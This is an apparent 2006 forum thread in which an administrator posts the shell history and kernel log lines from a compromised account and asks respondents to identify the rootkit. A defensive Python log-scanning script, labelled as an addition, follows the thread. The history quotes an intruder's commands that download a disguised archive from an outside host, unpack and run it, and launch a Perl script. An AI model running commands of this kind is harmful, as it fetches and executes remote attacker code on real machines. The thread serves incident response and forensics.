What rootkit is this? sockd/ gpm imaps2 - Security


Thread: What rootkit is this? sockd/ gpm imaps2

  1. What rootkit is this? sockd/ gpm imaps2

    Anybody recognize those filenames? I found those in a compromised
    account.

    I just discovered this, and blocked access to the account... FWIW, I
    got a nice trace of the activity in .bash_history:

    wget www.telnet22.com/roxy.jpg
    tar xvfz roxy.jpg
    cd sockd
    bash
    w
    uname -a
    cat /etc/hosts
    ls -la
    cd public_html/
    id
    lsw -la
    ls -la
    touch index.html
    ls -la
    cd .directory
    ls -la
    cd ..
    ls -la
    exit
    mkdir " "
    cd " "
    vi sendeb.pl
    wget www.telnet22.com/s/msg.txt
    vi users
    perl sendeb.pl
    exit


    I've sent this to Bluehost, where telnet22.com is hosted. I found this
    bad looking klogd message... can anybody interpret it for me?

    Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
    Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
    Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
    Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.

    I'd appreciate it --- thanks.


  2. Re: What rootkit is this? sockd/ gpm imaps2

    On 25 Sep 2006 00:06:56 -0700, "robb@acm.org" wrote:

    > /boot/System.map-2.6.5-7.257-default.


    Serves you right for running a 2 1/2 year old system.

    Grant.
    --
    http://bugsplatter.mine.nu/

  3. Re: What rootkit is this? sockd/ gpm imaps2

    robb@acm.org wrote:
    > Anybody recognize those filenames? I found those in a compromised
    > account.
    >
    > I just discovered this, and blocked access to the account... FWIW, I
    > got a nice trace of the activity in .bash_history:
    >
    > wget www.telnet22.com/roxy.jpg
    > tar xvfz roxy.jpg
    > cd sockd
    > bash
    > w
    > uname -a
    > cat /etc/hosts
    > ls -la
    > cd public_html/
    > id
    > lsw -la
    > ls -la
    > touch index.html
    > ls -la
    > cd .directory
    > ls -la
    > cd ..
    > ls -la
    > exit
    > mkdir " "
    > cd " "
    > vi sendeb.pl
    > wget www.telnet22.com/s/msg.txt
    > vi users
    > perl sendeb.pl
    > exit
    >
    >
    > I've sent this to Bluehost, where telnet22.com is hosted. I found this
    > bad looking klogd message... can anybody interpret it for me?


    telnet22.com appears to be shut down as a server, so it's worth giving
    the hosting service kudos for taking action.

    > Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
    > Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
    > Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
    > Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    > Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.


    Running klogd as root with the -i or -I switch causes the kernel to
    reload its symbols. "man klogd" for more info. It's proof that someone
    was root.

  4. Re: What rootkit is this? sockd/ gpm imaps2

    Allen Kistler wrote:

    > Running klogd as root with the -i or -I switch causes the kernel to
    > reload its symbols. "man klogd" for more info. It's proof that someone
    > was root.


    Interesting - thanks. Actually, I just realized that there was one
    message before these that's relevant - wrt. "gpm":

    Sep 22 13:15:07 neptune kernel: process `gpm' is using obsolete setsockopt SO_BSDCOMPAT
    Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
    Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
    Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
    Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.


    When I realized someone had been using this account, ps showed a "gpm"
    process running as this user. I killed the process, and I've found the
    complete executable and rootkit in the user directory. I'm sure it's
    not really gpm. :-)

    So it looks like this executable caused the symbol table to be re-read?
    Does this change the diagnosis? Is it possible that the hacker did
    *not* have root privs; they simply started this executable, which made
    some system call - which doesn't seem to have been successful in
    loading new modules. (?)


  5. Re: What rootkit is this? sockd/ gpm imaps2

    robb@acm.org wrote:
    > Allen Kistler wrote:
    >
    >> Running klogd as root with the -i or -I switch causes the kernel to
    >> reload its symbols. "man klogd" for more info. It's proof that someone
    >> was root.

    >
    > Interesting - thanks. Actually, I just realized that there was one
    > message before these that's relevant - wrt. "gpm":
    >
    > Sep 22 13:15:07 neptune kernel: process `gpm' is using obsolete setsockopt SO_BSDCOMPAT
    > Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
    > Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
    > Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
    > Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    > Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.
    >
    >
    > When I realized someone had been using this account, ps showed a "gpm"
    > process running as this user. I killed the process, and I've found the
    > complete executable and rootkit in the user directory. I'm sure it's
    > not really gpm. :-)
    >
    > So it looks like this executable caused the symbol table to be re-read?
    > Does this change the diagnosis? Is it possible that the hacker did
    > *not* have root privs; they simply started this executable, which made
    > some system call - which doesn't seem to have been successful in
    > loading new modules. (?)


    It's a lot more likely the kit executed a local privilege escalation and
    replaced at least pieces of the kernel. Unless you want to donate the
    server to science or law enforcement for a forensic investigation,
    isolate the machine, back up the data, wipe it all, and reinstall.
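A defender-side check for the pattern discussed in posts 3 and 4 (klogd re-reading System.map, with the `gpm' setsockopt warning logged just before it). This is an added example, not code from the thread: it scans syslog-style kernel lines for a klogd "state change" and reports any process the kernel complained about within a few seconds before it. The sample log is the thread's own lines re-joined as single syslog entries, plus one constructed benign klogd startup line that must not trigger.

```python
import re
from datetime import datetime

# Syslog prefix as written by klogd/syslogd: "Sep 22 13:15:07 neptune kernel: <msg>"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) kernel: (?P<msg>.*)$"
)
# Emitted when klogd re-reads the System.map; needs root (klogd -i / -I).
RELOAD_RE = re.compile(r"klogd [\d.]+, -+ state change")
# Kernel warning naming the process that made the obsolete setsockopt call.
BSDCOMPAT_RE = re.compile(r"process `(?P<proc>[^']+)' is using obsolete setsockopt SO_BSDCOMPAT")

# Constructed sample: the thread's lines as single entries, plus a normal startup line.
SAMPLE_LOG = """\
Sep 22 08:00:01 neptune kernel: klogd 1.4.1, log source = /proc/kmsg started.
Sep 22 13:15:07 neptune kernel: process `gpm' is using obsolete setsockopt SO_BSDCOMPAT
Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.
""".splitlines()


def parse_ts(ts, year=2006):
    """Syslog timestamps carry no year; the year is an assumption for ordering."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_symbol_reloads(lines, window_s=5):
    """One finding per klogd 'state change', listing processes the kernel
    warned about on the same host within window_s seconds before it."""
    events = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if m:
            events.append((parse_ts(m["ts"]), m["host"], m["msg"]))
    findings = []
    for ts, host, msg in events:
        if not RELOAD_RE.search(msg):
            continue
        nearby = [BSDCOMPAT_RE.search(m2)["proc"] for t2, h2, m2 in events
                  if h2 == host and BSDCOMPAT_RE.search(m2)
                  and 0 <= (ts - t2).total_seconds() <= window_s]
        findings.append({"host": host, "time": ts.strftime("%b %d %H:%M:%S"),
                         "nearby_procs": nearby})
    return findings


if __name__ == "__main__":
    for f in find_symbol_reloads(SAMPLE_LOG):
        print(f"{f['host']} {f['time']}: klogd symbol reload; preceded by {f['nearby_procs']}")
```

A reload that coincides with a warning about a process running as an ordinary user, as here, is the signal the thread's responders read as evidence of root access.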
